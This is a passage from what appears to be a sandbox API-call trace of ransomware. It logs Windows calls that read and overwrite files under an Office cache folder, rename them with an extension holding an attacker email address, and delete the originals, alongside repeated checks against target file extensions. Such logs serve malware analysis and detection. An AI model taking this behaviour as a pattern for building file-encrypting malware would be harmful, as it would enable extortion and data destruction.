Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0050.234] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0050.235] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.235] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.238] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.240] ReadFile (in: hFile=0x218, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.243] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.243] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.243] ReadFile (in: hFile=0x218, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.258] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.258] WriteFile (in: hFile=0x218, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0050.412] SetEndOfFile (hFile=0x218) returned 1 [0050.412] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fd70c8 [0050.426] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.426] WriteFile (in: hFile=0x218, lpBuffer=0x3fd70c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd70c8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.427] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.427] WriteFile (in: hFile=0x218, lpBuffer=0x3fd70c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd70c8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.429] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.429] WriteFile (in: hFile=0x218, lpBuffer=0x3fd70c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd70c8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.431] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fd70c8 | out: hHeap=0x5d0000) returned 1 [0050.431] CloseHandle (hObject=0x218) returned 1 [0050.431] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0050.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.432] lstrlenW (lpString=".doc") returned 4 [0050.432] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.432] lstrlenW (lpString=".docx") returned 5 [0050.432] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.432] lstrlenW (lpString=".pdf") returned 4 [0050.432] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.432] lstrlenW (lpString=".xls") returned 4 [0050.432] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.432] lstrlenW (lpString=".xlsx") returned 5 [0050.432] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.432] lstrlenW (lpString=".ppt") returned 4 [0050.432] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.432] lstrlenW (lpString=".zip") returned 4 [0050.432] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.432] lstrlenW (lpString=".rar") returned 4 [0050.432] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.432] lstrlenW (lpString=".bz2") returned 4 [0050.432] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.432] lstrlenW (lpString=".7z") returned 3 [0050.432] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.432] lstrlenW (lpString=".dbf") returned 4 [0050.432] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.432] lstrlenW (lpString=".1cd") returned 4 [0050.432] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0050.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.432] lstrlenW (lpString=".jpg") returned 4 [0050.432] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.433] lstrlenW (lpString=".doc") returned 4 [0050.433] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.433] lstrlenW (lpString=".docx") returned 5 [0050.433] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.433] lstrlenW (lpString=".pdf") returned 4 [0050.433] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.433] lstrlenW (lpString=".xls") returned 4 [0050.433] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.433] lstrlenW (lpString=".xlsx") returned 5 [0050.433] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.433] lstrlenW (lpString=".ppt") returned 4 [0050.433] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.433] lstrlenW (lpString=".zip") returned 4 [0050.433] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.433] lstrlenW (lpString=".rar") returned 4 [0050.433] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.433] lstrlenW (lpString=".bz2") returned 4 [0050.433] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.433] lstrlenW (lpString=".7z") returned 3 [0050.433] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.433] lstrlenW (lpString=".dbf") returned 4 [0050.433] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.433] lstrlenW (lpString=".1cd") returned 4 [0050.433] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0050.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.433] lstrlenW (lpString=".jpg") returned 4 [0050.433] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.433] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0050.434] lstrlenW (lpString="ose.exe") returned 7 [0050.434] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0050.434] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=174440) returned 1 [0050.434] CloseHandle (hObject=0x218) returned 1 [0050.434] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0050.434] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.434] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0050.434] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.435] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.435] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0050.435] GetLastError () returned 0x0 [0050.435] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x2a968, lpOverlapped=0x0) returned 1 [0050.439] WriteFile (in: hFile=0x1d0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0050.443] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.443] WriteFile (in: hFile=0x1d0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe2, lpOverlapped=0x0) returned 1 [0050.443] SetEndOfFile (hFile=0x1d0) returned 1 [0050.443] CloseHandle (hObject=0x1d0) returned 1 [0050.443] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.443] SetEndOfFile (hFile=0x218) returned 1 [0050.445] CloseHandle (hObject=0x218) returned 1 [0050.445] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0050.445] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0050.445] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.445] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.446] lstrlenW (lpString=".doc") returned 4 [0050.446] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.446] lstrlenW (lpString=".docx") returned 5 [0050.446] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0050.446] lstrlenW (lpString=".pdf") returned 4 [0050.446] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.446] lstrlenW (lpString=".xls") returned 4 [0050.446] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.446] lstrlenW (lpString=".xlsx") returned 5 [0050.446] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0050.446] lstrlenW (lpString=".ppt") returned 4 [0050.446] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.446] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.446] lstrlenW (lpString=".zip") returned 4 [0050.446] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.446] lstrlenW (lpString=".rar") returned 4 [0050.446] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.446] lstrlenW (lpString=".bz2") returned 4 [0050.446] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.446] lstrlenW (lpString=".7z") returned 3 [0050.446] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.446] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.446] lstrlenW (lpString=".dbf") returned 4 [0050.446] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.446] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.446] lstrlenW (lpString=".1cd") returned 4 [0050.446] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.446] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.446] lstrlenW (lpString=".jpg") returned 4 [0050.446] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.446] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.446] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.446] lstrlenW (lpString=".doc") returned 4 [0050.446] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.447] lstrlenW (lpString=".docx") returned 5 [0050.447] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0050.447] lstrlenW (lpString=".pdf") returned 4 [0050.447] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.447] lstrlenW (lpString=".xls") returned 4 [0050.447] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.447] lstrlenW (lpString=".xlsx") returned 5 [0050.447] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0050.447] lstrlenW (lpString=".ppt") returned 4 [0050.447] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.447] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.447] lstrlenW (lpString=".zip") returned 4 [0050.447] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.447] lstrlenW (lpString=".rar") returned 4 [0050.447] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.447] lstrlenW (lpString=".bz2") returned 4 [0050.447] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.447] lstrlenW (lpString=".7z") returned 3 [0050.447] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.447] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.447] lstrlenW (lpString=".dbf") returned 4 [0050.447] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.447] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.447] lstrlenW (lpString=".1cd") returned 4 [0050.447] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.447] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.447] lstrlenW (lpString=".jpg") returned 4 [0050.447] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.447] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0050.447] lstrlenW (lpString="osetup.dll") returned 10 [0050.447] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0050.448] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=7378792) returned 1 [0050.448] CloseHandle (hObject=0x218) returned 1 [0050.448] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0050.448] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.448] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0050.449] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0050.449] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0050.449] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.449] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.455] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.455] ReadFile (in: hFile=0x218, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.545] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.545] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.545] ReadFile (in: hFile=0x218, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.571] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.571] WriteFile (in: hFile=0x218, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0050.583] SetEndOfFile (hFile=0x218) returned 1 [0050.583] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f20060 [0050.587] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.587] WriteFile (in: hFile=0x218, lpBuffer=0x3f20060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20060*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.588] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.588] WriteFile (in: hFile=0x218, lpBuffer=0x3f20060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20060*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.701] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.701] WriteFile (in: hFile=0x218, lpBuffer=0x3f20060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20060*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f20060 | out: hHeap=0x5d0000) returned 1 [0050.765] CloseHandle (hObject=0x218) returned 1 [0050.765] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0050.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.766] lstrlenW (lpString=".doc") returned 4 [0050.766] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.766] lstrlenW (lpString=".docx") returned 5 [0050.766] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0050.766] lstrlenW (lpString=".pdf") returned 4 [0050.766] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.766] lstrlenW (lpString=".xls") returned 4 [0050.766] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.766] lstrlenW (lpString=".xlsx") returned 5 [0050.766] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0050.766] lstrlenW (lpString=".ppt") returned 4 [0050.766] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.766] lstrlenW (lpString=".zip") returned 4 [0050.766] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.766] lstrlenW (lpString=".rar") returned 4 [0050.766] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.766] lstrlenW (lpString=".bz2") returned 4 [0050.766] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.766] lstrlenW (lpString=".7z") returned 3 [0050.766] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.766] lstrlenW (lpString=".dbf") returned 4 [0050.766] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.766] lstrlenW (lpString=".1cd") returned 4 [0050.766] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.766] lstrlenW (lpString=".jpg") returned 4 [0050.766] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.766] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.766] lstrlenW (lpString=".doc") returned 4 [0050.767] lstrcmpiW (lpString1=".doc", 